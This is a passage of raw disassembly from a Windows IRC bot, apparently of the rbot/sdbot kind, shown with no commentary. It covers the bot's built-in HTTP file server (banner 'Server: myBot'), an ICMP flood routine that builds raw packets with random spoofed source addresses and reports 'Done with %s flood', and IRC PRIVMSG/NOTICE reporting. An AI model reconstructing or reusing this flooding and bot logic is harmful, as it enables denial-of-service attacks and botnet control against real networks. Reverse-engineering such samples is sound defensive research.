pop ecx
push 0
push ebx
lea eax, [ebp+var_114]
push eax
push [ebp+var_4]
xor esi, esi
lea edi, [ebp+var_114]
rep movsd
call dword_43575C ; recv
pop esi
pop ebx
loc_404AB5: ; CODE XREF: sub_4049D5+65�j
push [ebp+var_4]
call dword_4358F4 ; closesocket
call dword_435900 ; WSACleanup
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_314]
push eax
call sub_4145E5
cmp [ebp+arg_C], 0
pop ecx
pop ecx
pop edi
jnz short locret_404AFA
push 0
push [ebp+arg_8]
lea eax, [ebp+var_314]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 14h
locret_404AFA: ; CODE XREF: sub_4049D5+109�j
leave
retn
sub_4049D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_404AFC proc near ; DATA XREF: sub_404C6A+24E�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov eax, 1654h
lea ebp, [esp-74h]
call sub_414800
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+74h+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+74h+var_3C8]
push eax
lea eax, [ebp+74h+var_550]
push eax
call sub_4145E5
lea eax, [ebp+74h+var_2C4]
push eax
lea eax, [ebp+74h+var_654]
push eax
call sub_4145E5
xor ebx, ebx
add esp, 10h
cmp [ebp+74h+var_A4], ebx
lea eax, [ebp+74h+var_9C]
jz short loc_404B64
push offset aTextHtml ; "text/html"
jmp short loc_404B69
; ---------------------------------------------------------------------------
loc_404B64: ; CODE XREF: sub_404AFC+5F�j
push offset aApplicationOct ; "application/octet-stream"
loc_404B69: ; CODE XREF: sub_404AFC+66�j
push eax
call sub_4145E5
pop ecx
pop ecx
push 46h
lea eax, [ebp+74h+var_68]
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call ds:dword_42009C ; GetDateFormatA
push 1Eh
lea eax, [ebp+74h+var_20]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_420098 ; GetTimeFormatA
cmp [ebp+74h+var_B8], 0FFFFFFFFh
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_20]
push eax
lea eax, [ebp+74h+var_68]
push eax
lea eax, [ebp+74h+var_9C]
jnz short loc_404BD6
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_4145E5
add esp, 24h
jmp short loc_404BEE
; ---------------------------------------------------------------------------
loc_404BD6: ; CODE XREF: sub_404AFC+C1�j
push [ebp+74h+var_B8]
push eax
lea eax, [ebp+74h+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_4145E5
add esp, 28h
loc_404BEE: ; CODE XREF: sub_404AFC+D8�j
lea eax, [ebp+74h+var_1654]
lea edx, [eax+1]
loc_404BF7: ; CODE XREF: sub_404AFC+100�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_404BF7
push ebx
sub eax, edx
push eax
lea eax, [ebp+74h+var_1654]
push eax
push [ebp+74h+var_44C]
call dword_43587C ; send
cmp [ebp+74h+var_A4], ebx
jnz short loc_404C30
lea eax, [ebp+74h+var_550]
push eax
push [ebp+74h+var_44C]
call sub_4048D6
pop ecx
pop ecx
jmp short loc_404C4D
; ---------------------------------------------------------------------------
loc_404C30: ; CODE XREF: sub_404AFC+11C�j
lea eax, [ebp+74h+var_654]
push eax
push ebx
push [ebp+74h+var_44C]
lea eax, [ebp+74h+var_550]
push eax
call sub_4041E2
add esp, 10h
loc_404C4D: ; CODE XREF: sub_404AFC+132�j
push [ebp+74h+var_44C]
call dword_4358F4 ; closesocket
push [ebp+74h+var_B4]
call sub_412735
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_404AFC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C6A proc near ; CODE XREF: sub_404F24+37C�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
push 41h
xor eax, eax
pop ecx
lea edi, [ebp+var_210]
rep stosd
mov eax, [ebp+arg_8]
xor esi, esi
cmp byte ptr [eax], 2Fh
mov [ebp+var_4], esi
push eax
jz short loc_404C98
push offset aS_8 ; "\\%s"
jmp short loc_404CA0
; ---------------------------------------------------------------------------
loc_404C98: ; CODE XREF: sub_404C6A+25�j
mov byte ptr [eax], 5Ch
push offset aS_2 ; "%s"
loc_404CA0: ; CODE XREF: sub_404C6A+2C�j
lea eax, [ebp+var_10C]
push eax
call sub_4145E5
lea eax, [ebp+var_10C]
add esp, 0Ch
xor edi, edi
lea ecx, [eax+1]
loc_404CBA: ; CODE XREF: sub_404C6A+55�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_404CBA
sub eax, ecx
mov [ebp+arg_8], eax
jz short loc_404D40
push 2
pop ebx
loc_404CCB: ; CODE XREF: sub_404C6A+D4�j
lea eax, [ebp+var_10C]
lea edx, [eax+1]
loc_404CD4: ; CODE XREF: sub_404C6A+6F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_404CD4
sub eax, edx
cmp ebx, eax
jnb short loc_404D0D
cmp [ebp+esi+var_10C], 25h
jnz short loc_404D0D
cmp [ebp+esi+var_10B], 32h
jnz short loc_404D0D
cmp [ebp+esi+var_10A], 30h
jnz short loc_404D0D
inc esi
inc esi
inc ebx
mov [ebp+edi+var_210], 20h
inc ebx
jmp short loc_404D27
; ---------------------------------------------------------------------------
loc_404D0D: ; CODE XREF: sub_404C6A+75�j
; sub_404C6A+7F�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_404D1D
push 5Ch
pop eax
jmp short loc_404D20
; ---------------------------------------------------------------------------
loc_404D1D: ; CODE XREF: sub_404C6A+AC�j
movsx eax, al
loc_404D20: ; CODE XREF: sub_404C6A+B1�j
mov [ebp+edi+var_210], al
loc_404D27: ; CODE XREF: sub_404C6A+A1�j
inc esi
lea eax, [ebp+var_10C]
inc ebx
inc edi
lea ecx, [eax+1]
loc_404D33: ; CODE XREF: sub_404C6A+CE�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_404D33
sub eax, ecx
cmp esi, eax
jb short loc_404CCB
loc_404D40: ; CODE XREF: sub_404C6A+5C�j
lea eax, [ebp+var_210]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_314]
push offset aSS ; "%s%s"
push eax
call sub_4145E5
lea eax, [ebp+var_314]
push offset asc_4216D8 ; "\n"
push eax
call sub_415459
add esp, 18h
lea eax, [ebp+var_314]
push eax
call ds:dword_4200A0 ; GetFileAttributesA
xor ebx, ebx
inc ebx
cmp eax, 10h
jz short loc_404D91
cmp eax, 0FFFFFFFFh
jnz short loc_404D94
push [ebp+arg_0]
jmp loc_404E19
; ---------------------------------------------------------------------------
loc_404D91: ; CODE XREF: sub_404C6A+118�j
mov [ebp+var_4], ebx
loc_404D94: ; CODE XREF: sub_404C6A+11D�j
cmp [ebp+edi+var_211], 5Ch
jnz short loc_404DA1
mov [ebp+var_4], ebx
loc_404DA1: ; CODE XREF: sub_404C6A+132�j
mov eax, [ebp+arg_0]
xor edi, edi
cmp [ebp+var_4], edi
mov [ebp+var_6C4], eax
mov [ebp+var_318], edi
jz short loc_404E24
cmp [ebp+arg_C], edi
jz short loc_404E18
lea edi, [ebp+var_314]
dec edi
loc_404DC3: ; CODE XREF: sub_404C6A+15F�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_404DC3
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
mov esi, offset asc_421994 ; "*"
push eax
movsw
call sub_4145E5
lea eax, [ebp+var_210]
push eax
call sub_404997
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_4145E5
or [ebp+var_330], 0FFFFFFFFh
add esp, 14h
mov [ebp+var_31C], ebx
xor edi, edi
jmp short loc_404E73
; ---------------------------------------------------------------------------
loc_404E18: ; CODE XREF: sub_404C6A+150�j
push eax
loc_404E19: ; CODE XREF: sub_404C6A+122�j
call dword_4358F4 ; closesocket
jmp loc_404F0B
; ---------------------------------------------------------------------------
loc_404E24: ; CODE XREF: sub_404C6A+14B�j
push edi
push edi
push 3
push edi
push ebx
push 80000000h
lea eax, [ebp+var_314]
push eax
call ds:dword_420044 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_404E73
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_4145E5
pop ecx
pop ecx
push edi
push esi
mov [ebp+var_31C], edi
call ds:dword_420094 ; GetFileSize
push esi
mov [ebp+var_330], eax
call ds:dword_42003C ; CloseHandle
loc_404E73: ; CODE XREF: sub_404C6A+1AC�j
; sub_404C6A+1D7�j
mov esi, [ebp+arg_10]
push esi
lea eax, [ebp+var_8C4]
push offset aHttpdWorkerThr ; "[HTTPD]: Worker thread of server thread"...
push eax
call sub_4145E5
push edi
lea eax, [ebp+var_8C4]
push 4
push eax
call sub_412471
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov dword_436684[eax], esi
lea eax, [ebp+var_8]
push eax
push edi
lea eax, [ebp+var_6C4]
push eax
push offset sub_404AFC
push edi
push edi
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov dword_436694[ecx], eax
jnz short loc_404F1A
push [ebp+arg_0]
call dword_4358F4 ; closesocket
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_8C4]
push offset aHttpdFailedT_0 ; "[HTTPD]: Failed to start worker thread,"...
push eax
call sub_4145E5
lea eax, [ebp+var_8C4]
push eax
call sub_401EFF
add esp, 10h
loc_404F0B: ; CODE XREF: sub_404C6A+1B5�j
; sub_404C6A+2B8�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_404F12: ; CODE XREF: sub_404C6A+2B6�j
push 5
call ds:dword_420000 ; Sleep
loc_404F1A: ; CODE XREF: sub_404C6A+26F�j
cmp [ebp+var_318], edi
jz short loc_404F12
jmp short loc_404F0B
sub_404C6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_404F24 proc near ; DATA XREF: sub_401141+363�o
; sub_408A18+440E�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = dword ptr -6F0h
var_6EC = byte ptr -6ECh
var_464 = byte ptr -464h
var_360 = dword ptr -360h
var_358 = dword ptr -358h
var_354 = dword ptr -354h
var_350 = dword ptr -350h
var_34C = dword ptr -34Ch
var_340 = byte ptr -340h
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_414800
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
mov ecx, 0ECh
lea edi, [ebp+var_6F0]
rep movsd
push [ebp+var_360]
xor esi, esi
inc esi
mov [eax+3ACh], esi
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
mov [ebp+var_14], esi
mov [ebp+var_24], 2
call dword_435934 ; ntohs
and [ebp+var_20], 0
push 0
push esi
push 2
mov [ebp+var_22], ax
call dword_4357E8 ; socket
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
mov [ebp+var_8], ebx
jz loc_4052F7
mov eax, [ebp+var_358]
imul eax, 234h
mov dword_43668C[eax], ebx
push 10h
lea eax, [ebp+var_24]
push eax
push ebx
call dword_4358C0 ; bind
cmp eax, edi
jz loc_4052F7
push 7FFFFFFFh
push ebx
call dword_435908 ; listen
cmp eax, edi
jz loc_4052F7
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push ebx
call dword_43578C ; ioctlsocket
cmp eax, edi
jz loc_4052F7
push 41h
xor eax, eax
pop ecx
push eax
push eax
push eax
lea eax, [ebp+var_23C]
push eax
mov [ebp+var_124], ebx
mov [ebp+var_128], esi
mov [ebp+var_4], ebx
lea eax, [ebx+1]
jmp loc_4052D9
; ---------------------------------------------------------------------------
loc_405009: ; CODE XREF: sub_404F24+3CD�j
xor esi, esi
mov [ebp+arg_0], esi
loc_40500E: ; CODE XREF: sub_404F24+39C�j
lea eax, [ebp+var_23C]
push eax
push esi
call dword_43583C ; __WSAFDIsSet
test eax, eax
jz loc_4052B6
cmp esi, ebx
jnz short loc_40508B
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_138]
push eax
push ebx
mov [ebp+var_10], 10h
call dword_4357AC ; accept
cmp eax, 0FFFFFFFFh
jz loc_4052B6
mov edx, [ebp+var_128]
xor ecx, ecx
test edx, edx
jbe short loc_405064
loc_405056: ; CODE XREF: sub_404F24+13E�j
cmp [ebp+ecx*4+var_124], eax
jz short loc_405064
inc ecx
cmp ecx, edx
jb short loc_405056
loc_405064: ; CODE XREF: sub_404F24+130�j
; sub_404F24+139�j
cmp ecx, edx
jnz short loc_40507A
cmp edx, 40h
jnb short loc_40507A
mov [ebp+ecx*4+var_124], eax
inc [ebp+var_128]
loc_40507A: ; CODE XREF: sub_404F24+142�j
; sub_404F24+147�j
cmp eax, [ebp+var_4]
jbe loc_4052B6
mov [ebp+var_4], eax
jmp loc_4052B6
; ---------------------------------------------------------------------------
loc_40508B: ; CODE XREF: sub_404F24+102�j
mov edx, 400h
xor eax, eax
mov ecx, edx
lea edi, [ebp+var_28F0]
rep stosd
push eax
mov ecx, edx
lea edi, [ebp+var_18F0]
rep stosd
push 1000h
lea eax, [ebp+var_28F0]
push eax
push esi
call dword_43575C ; recv
test eax, eax
jg short loc_40510F
push esi
call dword_4358F4 ; closesocket
xor eax, eax
cmp [ebp+var_128], eax
jbe loc_4052B6
loc_4050D3: ; CODE XREF: sub_404F24+1BF�j
cmp [ebp+eax*4+var_124], esi
jz short loc_4050F9
inc eax
cmp eax, [ebp+var_128]
jb short loc_4050D3
jmp loc_4052B6
; ---------------------------------------------------------------------------
loc_4050EA: ; CODE XREF: sub_404F24+1DE�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
inc eax
loc_4050F9: ; CODE XREF: sub_404F24+1B6�j
mov ecx, [ebp+var_128]
dec ecx
cmp eax, ecx
jb short loc_4050EA
dec [ebp+var_128]
jmp loc_4052B6
; ---------------------------------------------------------------------------
loc_40510F: ; CODE XREF: sub_404F24+198�j
push 41h
xor eax, eax
pop ecx
lea edi, [ebp+var_340]
rep stosd
lea eax, [ebp+var_28F0]
xor ebx, ebx
xor esi, esi
lea ecx, [eax+1]
loc_405129: ; CODE XREF: sub_404F24+20A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_405129
sub eax, ecx
mov [ebp+var_C], eax
jz loc_4052B3
loc_40513B: ; CODE XREF: sub_404F24+2D0�j
mov al, [ebp+ebx+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_4051DE
mov esi, offset aGet ; "GET "
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_4150B0
test eax, eax
pop ecx
pop ecx
jz short loc_4051B8
lea eax, [ebp+var_18F0]
lea edx, [eax+1]
loc_405172: ; CODE XREF: sub_404F24+253�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405172
sub eax, edx
cmp eax, 5
jbe short loc_4051B8
mov eax, offset asc_420AE8 ; " "
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_4150B0
pop ecx
pop ecx
push eax
call sub_4150B0
pop ecx
pop ecx
push eax
call sub_415459
pop ecx
pop ecx
lea edx, [ebp+var_340]
loc_4051AC: ; CODE XREF: sub_404F24+290�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_4051AC
jmp short loc_4051CC
; ---------------------------------------------------------------------------
loc_4051B8: ; CODE XREF: sub_404F24+243�j
; sub_404F24+25A�j
push 3
mov edi, offset asc_4219D0 ; "\r\n"
lea esi, [ebp+var_18F0]
pop ecx
xor eax, eax
repe cmpsb
jz short loc_4051FF
loc_4051CC: ; CODE XREF: sub_404F24+292�j
xor eax, eax
mov ecx, 400h
lea edi, [ebp+var_18F0]
rep stosd
or esi, 0FFFFFFFFh
loc_4051DE: ; CODE XREF: sub_404F24+227�j
lea eax, [ebp+var_28F0]
inc ebx
inc esi
lea ecx, [eax+1]
loc_4051E9: ; CODE XREF: sub_404F24+2CA�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4051E9
sub eax, ecx
cmp ebx, eax
jb loc_40513B
jmp loc_4052B3
; ---------------------------------------------------------------------------
loc_4051FF: ; CODE XREF: sub_404F24+2A6�j
mov ecx, [ebp+var_128]
xor eax, eax
test ecx, ecx
jbe short loc_40523E
loc_40520B: ; CODE XREF: sub_404F24+2F6�j
mov edx, [ebp+eax*4+var_124]
cmp edx, [ebp+arg_0]
jz short loc_405233
inc eax
cmp eax, ecx
jb short loc_40520B
jmp short loc_40523E
; ---------------------------------------------------------------------------
loc_40521E: ; CODE XREF: sub_404F24+312�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
mov ecx, [ebp+var_128]
inc eax
loc_405233: ; CODE XREF: sub_404F24+2F1�j
dec ecx
cmp eax, ecx
jb short loc_40521E
dec [ebp+var_128]
loc_40523E: ; CODE XREF: sub_404F24+2E5�j
; sub_404F24+2F8�j
lea eax, [ebp+var_340]
lea edx, [eax+1]
loc_405247: ; CODE XREF: sub_404F24+328�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405247
sub eax, edx
mov esi, eax
lea eax, [ebp+var_464]
lea ecx, [eax+1]
loc_40525B: ; CODE XREF: sub_404F24+33C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40525B
sub eax, ecx
add eax, esi
cmp eax, 104h
jnb short loc_4052AA
and [ebp+var_C], 0
lea eax, [ebp+var_C]
push eax
push 8004667Eh
push [ebp+arg_0]
call dword_43578C ; ioctlsocket
push [ebp+var_358]
lea eax, [ebp+var_340]
push [ebp+var_34C]
push eax
lea eax, [ebp+var_464]
push eax
push [ebp+arg_0]
call sub_404C6A
add esp, 14h
jmp short loc_4052B3
; ---------------------------------------------------------------------------
loc_4052AA: ; CODE XREF: sub_404F24+347�j
push [ebp+arg_0]
call dword_4358F4 ; closesocket
loc_4052B3: ; CODE XREF: sub_404F24+211�j
; sub_404F24+2D6�j ...
mov ebx, [ebp+var_8]
loc_4052B6: ; CODE XREF: sub_404F24+FA�j
; sub_404F24+120�j ...
mov esi, [ebp+arg_0]
inc esi
cmp esi, [ebp+var_4]
mov [ebp+arg_0], esi
jbe loc_40500E
push 41h
xor eax, eax
pop ecx
push eax
push eax
push eax
lea eax, [ebp+var_23C]
push eax
mov eax, [ebp+var_4]
inc eax
loc_4052D9: ; CODE XREF: sub_404F24+E0�j
lea esi, [ebp+var_128]
lea edi, [ebp+var_23C]
push eax
rep movsd
call dword_43588C ; select
cmp eax, 0FFFFFFFFh
jnz loc_405009
loc_4052F7: ; CODE XREF: sub_404F24+66�j
; sub_404F24+8D�j ...
call dword_4358A0 ; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push offset aHttpdErrorServ ; "[HTTPD]: Error: server failed, returned"...
push eax
call sub_4145E5
xor esi, esi
add esp, 0Ch
cmp [ebp+var_350], esi
jnz short loc_40533F
push esi
push [ebp+var_354]
lea eax, [ebp+var_8F0]
push eax
lea eax, [ebp+var_6EC]
push eax
push [ebp+var_6F0]
call sub_4056FB
add esp, 14h
loc_40533F: ; CODE XREF: sub_404F24+3F6�j
lea eax, [ebp+var_8F0]
push eax
call sub_401EFF
pop ecx
push ebx
call dword_4358F4 ; closesocket
push [ebp+var_358]
call sub_412735
pop ecx
push esi
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_404F24 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_405367 proc near ; DATA XREF: sub_408A18+2D0E�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
pop ecx
mov esi, eax
lea edi, [ebp+var_1BC]
rep movsd
push 0FFh
xor esi, esi
push 3
inc esi
push 2
mov [eax+19Ch], esi
call dword_4357E8 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4053CE
call dword_4358A0 ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSocke ; "[ICMP]: Error: socket() failed, returne"...
push eax
call sub_4145E5
add esp, 0Ch
xor esi, esi
loc_4053C0: ; CODE XREF: sub_405367+9C�j
; sub_405367+C3�j
cmp [ebp+var_24], esi
jnz loc_405622
jmp loc_405602
; ---------------------------------------------------------------------------
loc_4053CE: ; CODE XREF: sub_405367+3A�j
push 4
lea ecx, [ebp+var_C]
push ecx
mov [ebp+var_C], esi
push 2
xor esi, esi
push esi
push eax
call dword_435804 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_405405
call dword_4358A0 ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpErrorSetso ; "[ICMP]: Error: setsockopt() failed, ret"...
push eax
call sub_4145E5
add esp, 0Ch
jmp short loc_4053C0
; ---------------------------------------------------------------------------
loc_405405: ; CODE XREF: sub_405367+7F�j
lea eax, [ebp+var_1B8]
push eax
call dword_43585C ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_40542C
lea eax, [ebp+var_3BC]
push offset aIcmpInvalidTar ; "[ICMP]: Invalid target IP."
push eax
call sub_4145E5
pop ecx
pop ecx
jmp short loc_4053C0
; ---------------------------------------------------------------------------
loc_40542C: ; CODE XREF: sub_405367+AE�j
xor eax, eax
lea edi, [ebp+var_1C]
stosd
stosd
stosd
stosd
push esi
mov [ebp+var_1C], 2
call dword_435934 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_43585C ; inet_addr
mov ebx, ds:dword_420004
mov [ebp+var_18], eax
mov [ebp+arg_0], esi
call ebx ; GetTickCount
mov [ebp+var_8], eax
call ebx ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_4055BA
mov esi, 100h
loc_405480: ; CODE XREF: sub_405367+24B�j
push 41Ch
mov byte_435340, 45h
call dword_435934 ; ntohs
mov word_435342, ax
xor eax, eax
cmp [ebp+var_2C], eax
mov word_435344, 1
mov word_435346, ax
mov byte_435348, 80h
mov byte_435349, 1
mov word_43534A, ax
jz short loc_4054EF
call sub_4147A1
mov edi, eax
shl edi, 8
call sub_4147A1
add edi, eax
shl edi, 8
call sub_4147A1
add edi, eax
shl edi, 8
call sub_4147A1
add edi, eax
mov dword_43534C, edi
jmp short loc_405507
; ---------------------------------------------------------------------------
loc_4054EF: ; CODE XREF: sub_405367+159�j
push [ebp+var_1BC]
call sub_407D51
pop ecx
push eax
call dword_43585C ; inet_addr
mov dword_43534C, eax
loc_405507: ; CODE XREF: sub_405367+186�j
mov eax, [ebp+var_18]
mov dword_435350, eax
call sub_4147A1
cdq
mov ecx, esi
idiv ecx
mov byte_435354, dl
call sub_4147A1
cdq
mov ecx, esi
idiv ecx
mov byte_435355, dl
call sub_4147A1
cdq
mov ecx, 0F0h
idiv ecx
and word_435356, 0
mov word_43535A, 1
inc edx
mov word_435358, dx
call sub_4147A1
cdq
mov ecx, 0FFh
idiv ecx
push 10h
mov edi, offset dword_43535C
mov al, dl
mov cl, al
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, esi
rep stosd
lea eax, [ebp+var_1C]
push eax
xor edi, edi
push edi
push 41Ch
push offset byte_435340
push [ebp+var_4]
call dword_4357B8 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_40563F
inc [ebp+arg_0]
call ebx ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
jbe loc_405480
xor esi, esi
loc_4055BA: ; CODE XREF: sub_405367+10E�j
push [ebp+var_4]
call dword_4358F4 ; closesocket
mov eax, [ebp+arg_0]
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
xor edx, edx
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset aIcmpDoneWithSF ; "[ICMP]: Done with %s flood to IP: %s. S"...
push eax
call sub_4145E5
add esp, 1Ch
cmp [ebp+var_24], esi
jnz short loc_405622
loc_405602: ; CODE XREF: sub_405367+62�j
push esi
push [ebp+var_28]
lea eax, [ebp+var_3BC]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_4056FB
add esp, 14h
loc_405622: ; CODE XREF: sub_405367+5C�j
; sub_405367+299�j
lea eax, [ebp+var_3BC]
push eax
call sub_401EFF
push [ebp+var_38]
call sub_412735
pop ecx
pop ecx
push esi
loc_405639: ; CODE XREF: sub_405367+347�j
call ds:dword_420014 ; ExitThread
loc_40563F: ; CODE XREF: sub_405367+231�j
push [ebp+var_4]
call dword_4358F4 ; closesocket
call dword_4358A0 ; WSAGetLastError
push eax
push [ebp+arg_0]
lea eax, [ebp+var_1B8]
push eax
push offset aIcmpErrorSendi ; "[ICMP]: Error sending packets to IP: %s"...
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_41483D
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_405697
push edi
push [ebp+var_28]
lea eax, [ebp+var_3BC]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_4056FB
add esp, 14h
loc_405697: ; CODE XREF: sub_405367+30E�j
lea eax, [ebp+var_3BC]
push eax
call sub_401EFF
push [ebp+var_38]
call sub_412735
pop ecx
pop ecx
push edi
jmp short loc_405639
sub_405367 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4056B0 proc near ; CODE XREF: sub_40863D+40�p
; sub_408A18+1B8�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push 200h
push eax
call sub_414894
lea eax, [ebp+var_200]
add esp, 10h
lea edx, [eax+1]
loc_4056DD: ; CODE XREF: sub_4056B0+32�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4056DD
push 0
sub eax, edx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43587C ; send
leave
retn
sub_4056B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4056FB proc near ; CODE XREF: sub_401000+B2�p
; sub_4010CA+61�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_405716
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_405716: ; CODE XREF: sub_4056FB+14�j
mov eax, edi
lea edx, [eax+1]
loc_40571B: ; CODE XREF: sub_4056FB+25�j
